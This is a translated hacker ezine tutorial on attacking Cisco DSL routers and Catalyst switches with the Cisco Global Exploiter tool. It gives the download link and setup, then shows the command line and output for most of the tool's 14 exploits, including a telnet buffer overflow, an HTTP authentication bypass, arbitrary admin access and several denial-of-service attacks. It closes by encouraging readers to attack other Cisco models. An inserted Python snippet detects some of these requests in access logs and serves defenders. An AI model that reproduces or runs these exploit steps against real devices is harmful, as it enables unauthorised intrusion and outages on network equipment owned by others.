
CISCO 675, 677 and 678 DSL ATTACKING

This time I want to share something about attacking CISCO-based networks. CISCO gear needs no introduction... not only because it is expensive... but also because of its reliability at routing. Does expensive mean secure...? For the answer, just ask Dew* *ersik*.. hehehe.. oops... whether it is secure or not is not in the hands of Dew* *ersik* but in the hands of the experts... right? But of course that is not all... the vendor's end product also has to be of good quality....

There are many attacks that can be carried out against CISCO-based networks, among them: Telnet Buffer Overflow, Denial of Service a.k.a. DoS, HTTP Authentication Bypass, HTTP Configuration Arbitrary Administrative Access, SSH DoS, UDP Flooding, Web Administration DoS, EIGRP generator, EIGRP Sniffing, Password Attacking, Catalyst Memory Leak, and many more.
How do you attack CISCO? One way is to use an application called CGE... yes, Cisco Global Exploiter, an all-round tool commonly used to attack CISCO-based networks.
CGE targets 14 vulnerabilities found in CISCO products, namely: Cisco 677/678 Telnet Buffer Overflow Vulnerability, Cisco IOS Router Denial of Service Vulnerability, Cisco IOS HTTP Auth Vulnerability, Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability, Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability, Cisco 675 Web Administration Denial of Service Vulnerability, Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability, Cisco IOS Software HTTP Request Denial of Service Vulnerability, Cisco 514 UDP Flood Denial of Service Vulnerability, CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability, Cisco Catalyst Memory Leak Vulnerability, Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability, 0 Encoding IDS Bypass Vulnerability (UTF), Cisco IOS HTTP Denial of Service Vulnerability.

There you go, 14 of them.... (heh, who has 14 of those...? **just kidding**), which means expensive does not mean free of weaknesses, right? Let's exploit these weaknesses, here is how:
. Download CGE13 here : http://packetstormsecurity.org/0405-exploits/cge-3.tar.gz
. Requirements: Perl
. Installation Linux : tar -zxvf cge-13.tar.gz

Tested :
. tested in ubuntu 9.10 Karmic Koala
. tested in target : CISCO 678 ADSL CPE, CISCO Catalyst 2950, CISCO Router 1760

Execution :
. Run a scan to obtain the target IP.

Then move on to the target that was found, with these steps:
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl
Usage :
perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

Example :
1. If we want to run the Telnet Buffer Overflow against the Cisco 677 and 678 ADSL CPE :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 1
��_��_��_
*******************
Welcome to Vulcan
*******************
Conexant Inc., Software Release 2.5.060823m
Copyright (c) 2001-2003 by Conexant, Inc.
login: ?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%
XX%%%%%?????????????????a~ %%%%%XX%%%%%?????????????????a~ %%%%%XX

2. If we want to run the DoS against an IOS Router :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 2
Packet sent ...
Now checking server's status ...
Vulnerability unsuccessful exploited. Target server is still up ...

3. If we want to exploit HTTP Auth :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.1.254 3
Vulnerability successful exploited with [http://192.168.1.254/level/17/exec/....] ...

4. If we want to run IOS HTTP Configuration Arbitrary Administrative Access :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 4
Vulnerability successful exploited ...

5. If we want to run the DoS against the Catalyst SSH Protocol :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 5
Packet sent ...

6. If we want to run the Web Administration Denial of Service :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 6
Packet sent ...
Server response :
-
-
-

7. If we want to run the Remote Arbitrary Command against the Catalyst 3500 XL :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 7
Enter a file to read [ /show/config/cr set as default ] :
Packet sent ...
Server response :
HTTP/1.0 404 Not Found
Server:
Content-Type: text/html
Date: Sat, 01 Jan 2005 17:09:54 GMT
Last-Modified: Sat, 01 Jan 2005 17:09:54 GMT
Accept-Ranges: bytes
Connection: close
<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>404 Not Found</H2>
The requested URL '/exec/show/config/cr' was not found on this server.
<HR>
<ADDRESS><A href=""></A></ADDRESS>
</BODY>
</HTML>
** sorry, the test failed... because the target was a CISCO 678 ADSL CPE.. This vulnerability only applies to the CISCO Catalyst 3500 XL **


8. If we want to run the UDP Flood Denial of Service :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 9
Input packets size : 500
Packets sent ...
Please enter a server's open port : 23 ** you can use port 53 **
Now checking server status ...
Vulnerability unsuccessful exploited. Target server is still up ...

9. If we want to run the "Memory Leak" against a CISCO Catalyst :
root@lirva32-laptop:/home/lirva32/cge-13# perl cge.pl 192.168.0.254 11
Input the number of repetitions : 1000
** waiting until your CISCO Memory Leak.. bye..bye..catalyst... **
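
Seen from the monitoring side, example 3 above leaves a clear trace: the URL it reports uses privilege level 17, while IOS privilege levels only run from 0 to 15, and example 7 requests /exec/ paths without logging in. The following is an added example, not part of the original article or of CGE, that flags both patterns in an HTTP access log; the log format, addresses and function name are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: common-log-format lines from a hypothetical proxy or
# sensor in front of router management interfaces (not real captured traffic).
SAMPLE_LOG = """\
10.0.5.23 - - [01/Jan/2005:17:09:50 +0000] "GET /level/15/exec/show/version HTTP/1.0" 401 0
10.0.5.23 - - [01/Jan/2005:17:09:51 +0000] "GET /level/16/exec/show/config HTTP/1.0" 401 0
10.0.5.23 - - [01/Jan/2005:17:09:52 +0000] "GET /level/17/exec/show/config HTTP/1.0" 200 2143
10.0.9.4 - admin [01/Jan/2005:17:12:00 +0000] "GET /level/15/exec/show/version HTTP/1.0" 200 812
10.0.9.7 - - [01/Jan/2005:17:13:10 +0000] "GET /exec/show/config/cr HTTP/1.0" 404 0
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
LEVEL_EXEC = re.compile(r'^/level/(\d+)/exec(/|$)')
MAX_IOS_PRIV = 15  # IOS privilege levels run from 0 to 15

def analyze(log_text):
    """Return (findings, sweepers): per-request alerts and level-sweeping sources."""
    findings, levels_by_src = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        src, user, _method, path, status = m.groups()
        lvl = LEVEL_EXEC.match(path)
        if lvl:
            level = int(lvl.group(1))
            levels_by_src[src].add(level)
            if level > MAX_IOS_PRIV:
                # A 200 answer to an out-of-range level means the device served it.
                sev = "high" if status == "200" else "medium"
                findings.append((sev, src, path,
                                 "exec URL with privilege level above 15"))
        elif path.startswith("/exec/") and user == "-":
            findings.append(("medium", src, path, "unauthenticated /exec/ request"))
    # A source walking through several level numbers is probing, not administering.
    sweepers = sorted(s for s, lv in levels_by_src.items() if len(lv) >= 3)
    return findings, sweepers

if __name__ == "__main__":
    alerts, sweeping = analyze(SAMPLE_LOG)
    for sev, src, path, why in alerts:
        print(f"[{sev}] {src} {path}: {why}")
    print("level sweep from:", sweeping)
```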

Well, lirva32 can only give samples like these... feel free to continue with attacks against other CISCO series.. we will share more in our beloved ezine next time.
Finally, lirva32's message is that "no system is 100% secure, even one built with expensive equipment". Hopefully this article adds to your store of knowledge... hope it is useful.

Source : lirva32.org